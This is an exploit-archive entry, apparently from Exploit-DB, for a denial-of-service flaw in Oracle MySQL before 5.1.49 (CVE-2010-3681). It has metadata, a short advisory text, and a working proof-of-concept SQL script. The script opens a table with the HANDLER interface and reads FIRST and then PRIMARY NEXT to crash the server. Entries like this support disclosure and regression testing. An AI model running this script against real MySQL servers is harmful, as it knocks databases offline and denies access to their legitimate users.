Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial of Service

Author: Matthias Leich
type: dos
platform: linux
port: 
date_added: 2010-08-20 
date_updated: 2014-09-02 
verified: 1 
codes: CVE-2010-3681;OSVDB-69000 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/42633/info

MySQL is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the database, denying access to legitimate users.

This issue affects versions prior to MySQL 5.1.49.

NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it..

--disable_warnings
DROP TABLE IF EXISTS t1;
--enable_warnings
CREATE TABLE t1  ( pk INT , PRIMARY KEY (pk));
HANDLER t1 OPEN AS handler_a;
HANDLER handler_a READ FIRST;
HANDLER handler_a READ `PRIMARY` NEXT;

DROP TABLE t1;